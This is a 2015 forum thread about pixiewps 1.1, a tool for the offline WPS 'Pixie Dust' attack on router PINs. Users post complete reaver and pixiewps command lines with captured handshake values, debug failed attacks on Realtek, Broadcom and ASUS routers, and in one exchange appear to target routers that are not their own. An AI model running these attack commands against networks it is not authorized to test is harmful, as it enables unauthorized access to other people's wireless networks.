- Althought now pixiewps can be run without a modded version of Reaver (using --dh-small), the modded version made by t6_x and datahead is still recommended

The (almost) full bruteforce for the new attack is performed using the option -f (--force). I say almost because it starts bruteforcing around the current machine time and goes backwards.

What is not implemented yet but may come in (a not near) future (so don't ask :)):
- Multithreading (I tried to do a 'quick and dirty' implementation but it did more harm than good)
- Read all data needed from a .cap (always with --dh-small)

Below an example of AuthKey computation:

http://i.imgur.com/Giac0q8.png

zimmaro
2015-05-01, 19:38
@wiire all always SUPER thanks!!

Desuu
2015-05-01, 20:55
Thanks for the new update, but it starts to get confusing with all these arguments now :D can we get a small tutorial ?

nuroo
2015-05-01, 20:59
Cant wait to try this new version. I will report back soon.

Extradry
2015-05-02, 00:02
https://github.com/t6x/reaver-wps-fork-t6x/issues/11

Cheers
Extra

wn722
2015-05-02, 10:02
soo... this works for Atheros now?

kcdtv
2015-05-02, 10:31
What a beautiful Saturday midday!
Sun is shining, day off and this magnificent version 1.1 is out!
Great job wiire!
So i can confirm that all devices from rtl819x projects are vulnerable if their firmware is based on Realtek SDK (But why wouldn't it be based on the tool designed and provided by realteck to create them?)

To make it a litlle hard for pixiewps and to really fully try this new -f option ( brute force on seed with time backwarding) i reset my realteck device to factory default ( first build time in 2012)
In a cheap laptop with poor microprocessor (around 600 key/sec with aircrack-ng ).
http://pix.toile-libre.org/upload/original/1430562562.pnghttp://pix.toile-libre.org/upload/original/1430562605.pnghttp://pix.toile-libre.org/upload/original/1430562641.png


soo... this works for Atheros now?
:confused:
you should read back wiire posts in this tread


Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?
that's just three more arguments ( i think )
Basicaly if your router has a realtek chipset and you don't get the PIN using pixiewps 1.0 (or using pixiewps 1.1 without the hew features) it wil work with the new pixiewps 1.1 using .f argument
notice the possibility to compute the authkey form *.cap file that allows you to make a full "offline attack" just by grabbing the required strings in your M packets. (small dh key option , -S, has to be used with reaver and pixiedust)

wiire
2015-05-02, 11:08
@kcdtv
You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.

Also I've been told there a routers that after failing retrieving the right date and time from the Internet, reset it to 0 (1st January 1970).

Any problems compiling on Ubuntu at all?

@wn722
I'm afraid that Atheros and Marvell will remain unbreakable.

As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011 was bought by Marvell. Read it from Wikipedia.

kcdtv
2015-05-02, 11:35
No problems at all in Ubuntu & Xubuntu :)

You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.
Sweet!

Also I've been told there a routers that after failing retrieving the right date and time from the Internet, reset it to 0 (1st January 1970).
lol
I can tell you that is not the case with rtl8192x based routers (i have alfa AIP-W525H and totolink NR301RT) that have been using for years... the farest they go back to is last build... both of mine are form 2012 and checking and i think, nut i may be wrong that we shouldn't have to go more backward than that date that appear in probes WPS : EV-2010-09-20 as i have the same for both routers which are form different month, it seems to be a genric base date time ..


As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011
this guys from atheros know who they hire! For sure we won't get es-1=es-2=0 with somobody like this beyond the code XD

wiire
2015-05-02, 11:58
Thanks for the new update, but it starts to get confusing with all these arguments now :D can we get a small tutorial ?

I think soxrok is going to upload a new tutorial. There are some examples at the bottom of the usage screen. But basically what you want to do normally is launching pixiewps without --force. Then if the pin is not found and pixiewps prints a warning saying that the router might be vulnerable, then you may wanna try with --force. What pixiewps does is using the current time and date as reference and going backwards trying to recover the seed because the router time and date might be not right (like set at factory time).

Also I set the default verbosity level to 2 but you may probably want to set it to 3.

psicomantis
2015-05-02, 13:48
Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.

The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforce the new PRNG though (that is mode 4) it tests normally for a small window of time (approximately 10 days) because the new bruteforce is more consuming power.

So --force is basically used only if the router has set its time to past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that. :)

Also would you mind replying on the pixiewps thread for program related questions? Thanks.


Thank you very much for clarifying Wiire.

Saydamination
2015-05-02, 14:37
Hello , @Wiire @Kcdtv


Chipset : Realtek RTL8671

Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

Command : pixiewps -e -r -s -z -a -n -f

I m waiting for 3 hours :) and Pixiewps is continiou...

What can I do ? Suggestion?

a ) Give up

b) Continiou , No risk no fun

:)

kcdtv
2015-05-02, 14:59
We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
But wire has been told that some realteck chipset could go back until 1970
so if you can leave it that would be great.
This chipset could be the one... it is not form the X project serie, so it has good chance.
Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
I was also thinking about an option that allows to define a point in time.
Let's say i choose 01-01-2012 00:00
Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
that maybe a bit weird and strange but i thought it may be intersiting
cheers

wiire
2015-05-02, 15:01
Hello , @Wiire @Kcdtv


Chipset : Realtek RTL8671

Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

Command : pixiewps -e -r -s -z -a -n -f

I m waiting for 3 hours :) and Pixiewps is continiou...

What can I do ? Suggestion?

a ) Give up

b) Continiou , No risk no fun

:)

3 hours...?

I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

wiire
2015-05-02, 15:08
We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
But wire has been told that some realteck chipset could go back until 1970
so if you can leave it that would be great.
This chipset could be the one... it is not form the X project serie, so it has good chance.
Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
I was also thinking about an option that allows to define a point in time.
Let's say i choose 01-01-2012 00:00
Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
that maybe a bit weird and strange but i thought it may be intersiting
cheers

Yes now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said I run it on my desktop PC which takes only 20 minutes to exaust the keyspace so... yeah...

If some of you get:

"[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."

But doesn't find the pin after the --force bruteforce (and your computer time is ok) let me know. I assumed that the router cannot have set time to future but... you never know... :)

Saydamination
2015-05-02, 15:40
hello @Kcdtv and Wiire ,

Many thanks for comment and suggestion... you're absolutely right...Your idea is great about option..

I m really wondering what would happen it ... So I wanna wait until ending test :)

I will turn back with test results..

Cheers..

Saydamination
2015-05-02, 19:47
3 hours...?

I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

Hello Wiire,

Test Finished ... I m not lucky.. :)

Reaver Results:



Associated with 90:F6:52:xX:xX:BX (ESSID: x)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
[P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e :e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:4 8:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef: 10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8 :d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:8 3:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e: 8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c :dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:5 9:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95: 96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd :b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:1 9:69:0b:67:f3:9e:04:88:73
[P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c :db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a
[+] Sending M2 message
[P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69 :05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
[P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18 :e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 13 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]


Pixiewps Results:



pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e :e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:4 8:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef: 10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8 :d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:8 3:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e: 8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c :dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:5 9:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95: 96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd :b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:1 9:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69 :05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18 :e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c :db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45

Pixiewps 1.1

[-] WPS pin not found!

Time taken: 27220 s



Pin:12345670

wiire
2015-05-02, 20:08
Hello Wiire,

Test Finished ... I m not lucky.. :)



[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45



There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.

Saydamination
2015-05-02, 20:47
You are right Wiıre.. This router is different .. I Think there is some protect ..

I will try other options...

This is Wireshark screen:

http://imgur.com/IkpSn7C

Saydamination
2015-05-03, 15:19
root@bt:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b -r 8c:da:44:e4:bf:e5:e4:a5:72:1e:c2:8e:8e:a4:c9:1f:28 :16:95:f3:b8:fd:2c:9a:ad:5d:27:51:38:25:5d:cf:1f:2 5:35:65:99:f5:a3:1f:bc:c2:ff:59:45:3f:8d:a6:9a:72: c6:9d:1c:de:c9:2f:5e:e4:4f:f4:7a:7c:53:50:c7:da:d4 :50:37:b5:a0:1d:bb:8c:a5:35:fc:b5:cd:2b:22:3b:5e:2 e:23:51:10:bc:8e:7e:c3:bd:65:3d:35:dd:5c:c6:83:ef: 69:0d:6d:e7:d7:b2:e1:98:c7:53:0b:50:ce:3a:dd:66:42 :6b:0f:34:50:13:f1:71:0e:3c:f1:ab:a6:0d:23:22:08:f 5:b1:7c:b2:dd:c5:b6:91:c6:fe:d6:ca:fe:e0:7b:ed:22: 90:3c:06:d3:9c:ae:b7:77:79:ca:2a:cc:42:ac:3f:07:0b :73:69:31:7c:f9:69:ea:24:69:d1:4e:f3:b1:cf:bb:22:7 6:60:3f:11:8a:91:46:ba:a7 -s 2c:ed:7a:66:54:84:55:80:ae:28:52:78:7a:bb:41:a8:37 :42:bf:fc:cf:2e:cd:4d:53:86:06:0c:0b:79:85:19 -z 8a:d4:8e:83:e0:00:34:99:78:c5:2b:92:11:ff:f6:ae:18 :1f:15:1a:da:f7:5d:41:44:8f:ef:00:26:75:38:0a -a db:a5:68:39:87:53:fa:7a:1c:2a:ce:3f:f9:c8:5d:de:8b :63:e8:c6:b8:97:18:04:30:3a:90:7a:1f:aa:20:80 -n 45:7b:18:6c:14:80:7e:17:7f:d6:22:84:43:74:49:ad -f

Pixiewps 1.1

[-] WPS pin not found!

Time taken: 16902 s

root@bt:~#

KIMW
2015-05-04, 19:32
Hi,

I cannot install pixiewps, I get the following message:

gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
In file included from pixiewps.c:51:0:
pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
compilation terminated.
make: *** [all] Error 1

I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto and also the recommendation given by mmusket33 (https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool&p=44587&viewfull=1#post44587) but I still have the same problem. I would really appreciate if anybody could help me... Thanks in advance.

RedPanda
2015-05-06, 20:59
@KIMW

pixiewps is now in kali official rep you can install it with "apt-get install pixiewps"

undersc0re
2015-05-07, 16:43
If your kali has been updated as of today may-7, do you have the necessary tools installed and updated to successfully do the pixiewps attack? I have been testing my routers with wps enabled and firewall turned off etc with no luck, I had some luck on a friends dlink when I used the pin but it did not spit out the key. I am attaching what I seem to always get on my broadcom and asus, the zyxel just won't work at all. I am trying both adapters 36neh and the 51nh with no luck. Especially never spits out the Hashes (ehash1 and ehash2) during the transaction. I am thinking I might have a bad installation of something. I have played around with trying different options as well, also read through many tutorials which show people always getting the ehash1 and ehash2 which I never seem to get, maybe all the routers I try are not supported to spit those out....


root@kali:~# time reaver -i wlan1mon -c 11 -b A8:39:44:41:10:E0 -K 1 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from A8:39:44:41:10:E0
[+] Associated with A8:39:44:41:10:E0 (ESSID: mil0)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d5:06:2e:f0:0b:f1:39:03:f3:e5:df:fe:c1:9f:cc:fb
[P] PKE: 90:02:ed:eb:04:1b:a3:6a:b4:2a:7f:1b:79:c2:d9:ad:e2 :c2:3b:ab:ff:fa:82:27:c7:2f:e7:6a:91:0f:51:2d:20:e c:9d:02:f7:41:39:b4:c7:be:de:ca:8d:26:0e:af:19:a3: 8a:e4:84:cc:69:02:e8:f9:ec:15:a0:e2:87:32:0c:54:c6 :1c:4e:19:3d:25:02:49:fe:59:25:66:38:83:22:19:23:a a:f5:90:2e:41:b1:53:c4:68:94:ee:ea:a5:f0:4c:d8:d9: ec:c0:1b:85:0c:64:2f:3f:fd:6d:4b:1d:4f:2c:ea:1b:d0 :dd:ee:e5:85:ae:d5:ca:61:05:b0:8a:1d:23:df:b1:b6:f 3:6d:04:78:cd:14:c2:c2:80:48:54:4e:4c:77:91:9e:41: b9:65:94:5f:e9:06:6d:8f:90:d3:28:ff:f0:b7:2e:78:e3 :93:b6:ef:b1:26:43:b0:45:c5:0a:1a:be:20:6c:a5:3c:b e:3b:7e:2c:5e:a1:0b:19:b1
[P] WPS Manufacturer: Broadcom
[P] WPS Model Name: Broadcom
[P] WPS Model Number: 123456
[P] Access Point Serial Number: 1234
[+] Received M1 message
[P] R-Nonce: b0:e6:b2:95:77:cf:66:23:a3:89:be:19:c0:fb:4e:78
[P] PKR: d5:c1:6b:bf:ff:50:8e:67:99:8c:d0:70:1f:7f:1f:60:12 :0b:a8:e3:84:a6:6d:1b:30:1a:81:94:e2:4d:3b:17:bc:d 3:db:64:7b:70:a7:1d:4b:05:2b:1e:39:03:92:79:63:a7: 56:0e:36:7d:af:89:27:7b:95:93:61:8f:e1:a5:b3:db:d1 :a8:6c:fa:05:1a:27:e6:20:18:1c:ed:ca:32:e3:4c:8e:6 1:fd:a2:31:18:6c:80:c8:ad:48:a2:d6:c7:30:6d:24:a1: 35:c1:7b:17:9c:72:e6:f9:67:d7:0b:0e:f6:19:24:58:67 :06:db:a0:23:a5:3e:f2:e8:de:e9:c4:d1:02:68:f9:76:f 6:83:c6:3d:d1:de:7b:fe:46:6b:aa:ca:e9:53:a9:d5:ca: 91:52:a7:08:ed:b1:92:4e:b3:b8:50:3c:32:fd:81:7f:bb :ca:b2:bf:8a:c7:ef:d8:3c:6d:0a:1d:9b:fa:a1:41:38:6 3:f7:a9:9a:4f:47:38:37:de
[P] AuthKey: 53:60:51:4a:9f:af:ad:6b:10:5f:2a:fc:85:d4:f3:38:fc :88:2e:dc:52:f8:f4:5a:de:ee:90:e3:5d:3f:a9:96
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
^C
[+] Nothing done, nothing to save.

real 0m13.437s
user 0m0.260s
sys 0m0.052s


With the asus n56u



[+] Associated with E0:3F:49:E3:73:71 (ESSID: MILLA)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
[!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
[!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[P] E-Nonce: 0f:c9:4f:ac:5d:27:4c:06:13:74:6f:05:fc:ec:bb:19
[P] PKE: ca:dc:10:7d:43:a3:ce:9a:9d:7f:0a:45:0f:bf:10:15:30 :6b:83:09:f2:d4:69:37:0a:eb:97:c7:27:56:63:70:a0:6 4:49:11:09:f0:39:3e:af:e9:e3:74:d2:2e:76:2b:52:b4: f6:87:a8:da:26:2c:dc:1a:d9:25:29:03:51:4e:3a:99:49 :32:14:62:8e:73:35:31:4c:21:fa:e7:a7:84:de:98:95:f 1:dc:f7:23:ff:25:d6:b7:fb:c8:0d:52:67:5f:11:96:bf: a3:d4:08:b3:99:7e:51:37:1a:46:4b:a6:6d:88:e1:56:c4 :a5:84:61:1a:a0:e4:f8:db:5c:ab:78:a9:0c:0c:d1:2c:8 e:67:0e:5f:37:ce:07:00:50:6d:6b:d9:e1:df:4c:6b:e2: 3c:f9:f5:85:84:67:54:56:79:61:84:d7:a0:b9:2c:14:02 :33:54:24:68:21:f5:e0:22:6c:00:b4:b3:5d:58:9e:49:9 2:85:06:cf:10:16:c3:3c:e8
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: WPS Router
[P] WPS Model Number: RT-N56U
[P] Access Point Serial Number: 00000000
[+] Received M1 message
[P] R-Nonce: dd:00:db:6e:84:39:cd:26:d1:7c:bb:42:fa:f6:6b:cf
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 6a:1e:35:9e:61:a6:13:8b:f9:b5:d1:33:b8:fa:07:e7:10 :80:20:76:9b:1e:d2:15:9e:8e:46:35:d1:65:2b:a8
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin


Should it be sending M3 msg?

t6_x
2015-05-07, 17:42
apparently you are too far from the router to communicate properly with him

Try to get closer to the router.

undersc0re
2015-05-07, 19:34
apparently you are too far from the router to communicate properly with him

Try to get closer to the router.

The broadcom was in the basement and the asus on the same table as my computer, but I will continue to test and keep trying! Only time I had a response any better was getting the pins for a -W against my friends dlink router and trying them and then it only failed in the end as it was unable to retrieve the passphrase. I will trouble shoot some more, I am sure it is something simple I am overlooking. Thanks for your input though. Is it ok to ask these questions here or should I be in an irc channel or different forum area?

soxrok2212
2015-05-07, 19:45
The broadcom was in the basement and the asus on the same table as my computer, but I will continue to test and keep trying! Only time I had a response any better was getting the pins for a -W against my friends dlink router and trying them and then it only failed in the end as it was unable to retrieve the passphrase. I will trouble shoot some more, I am sure it is something simple I am overlooking. Thanks for your input though. Is it ok to ask these questions here or should I be in an irc channel or different forum area?

It would be preferred to put it on the reaver thread

iliass
2015-05-08, 15:12
Thanks For your Pixiewps 1.1 ..Now TD5130 V 1 works and V 2 it works But V 3 not works And thomson routeur

soxrok2212
2015-05-08, 17:15
Thanks For your Pixiewps 1.1 ..Now TD5130 V 1 works and V 2 it works But V 3 not works And thomson routeur

Dude we're not here to hack all your neighbors wireless, it's meant for you to test your own network, and it's clear that you are not using it explicitly for that.

Saydamination
2015-05-08, 20:11
about -f , --force option ...
I tried to find my pin with -f option , But it was not find.. Realtek Chipset ..
İt seacrhed PRNG between 2015 and 1971 years....

I wanna ask..

Maybe Prng is set between 2015 and 2038 years..?? Becasuse PRNG , time seed finish at 01.01.2038..

Or large time 1901 ?

is it possible ?

Other question ..

İf I set my sytem time 1901 ... İs it runnig 1971 ? or error?

Saydamination
2015-05-08, 20:29
Dude we're not here to hack all your neighbors wireless, it's meant for you to test your own network, and it's clear that you are not using it explicitly for that.

experience is something you don't get until just after you need it.

mmusket33
2015-05-10, 10:06
Musket Teams have released their lab version of Pixie Dust Data Sequence Analyzer PDDSA-06.sh for general use. This script requires the installation of pixiedust1.1 by wiire and has been updated to allow for the more advanced features of version 1.1 such as brute forcing the WPS Pin

PDDSA-06.sh supports the latest modded reaver program from t6_x and datahead and soxrok2212 as of 11 May 15

You can download at:

http://www.datafilehost.com/d/a30c5b3d

or the attachment below at the link below.


http://forum.aircrack-ng.org/index.php?topic=868.msg2904


Older versions of the modded reaver program are not supported

MTeams

nuroo
2015-05-10, 14:04
@mmusket33
I like the idea of your script to automatically try different data sets. I tried it out and it didnt parse the output from reaver correctly.
The E-Nouce, PKE were blank......... and it leaves out (-m, --r-nonce : Registrar nonce) - but all required data was in the reaver output

usuage command line:
reaver -i wlan2mon -b 00:00:00:00:A7:7C -m 00:00:00:00:2c:ee -vv -f -c6 -N -K1 -s y -A -t30 | tee /root/VARMAC_LOGS/TP-TP-LIN00000000

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

[+] Switching wlan2mon to channel 6
[+] Waiting for beacon from 00:00:00:00:A7:7C
[+] Associated with 00:00:00:00:A7:7C (ESSID: TP-TP-LIN0000000)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: ba:18:d0:c0:0a:6f:9e:9e:02:48:74:3c:c4:17:8e:1a
[P] PKE: 8f:e6:47:0d:0c:c9:ee:9e:be:28:9b:c7:64:00:ed:b7:54 :21:65:5d:c3:74:cb:9f:97:08:42:19:0e:b0:6a:da:91:4 1:97:1f:f0:79:1d:ae:d8:e3:9c:ac:10:cc:17:73:77:2a: d5:6b:68:d3:3c:85:9a:8d:ef:57:ce:bc:07:c2:7b:4b:24 :f1:36:ea:0a:f7:50:b2:e4:24:89:38:99:df:b8:a9:5d:5 b:29:b9:87:a7:59:72:3c:7a:6c:d7:da:88:b7:bb:4b:d9: 97:08:b5:00:0c:c1:c3:96:8f:10:48:b8:5e:e6:e9:0e:0b :f4:2d:cf:4a:5a:bd:62:e3:27:1f:3e:13:93:ab:1a:b2:b d:bf:1f:41:d4:a5:4d:d9:a9:59:13:16:f0:d0:da:ad:a0: 67:b4:34:27:f8:1a:85:4a:2e:a0:c0:b4:12:10:ba:54:d3 :4f:ce:37:51:3f:72:f9:6d:99:d4:49:07:ca:13:2b:6f:4 1:bc:8a:c7:ac:bf:7b:14:58
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Name: TL-WR720N
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 1.0
[+] Received M1 message
[P] R-Nonce: 11:a4:d4:0f:5e:9e:dd:57:ae:12:5e:35:f2:49:43:18
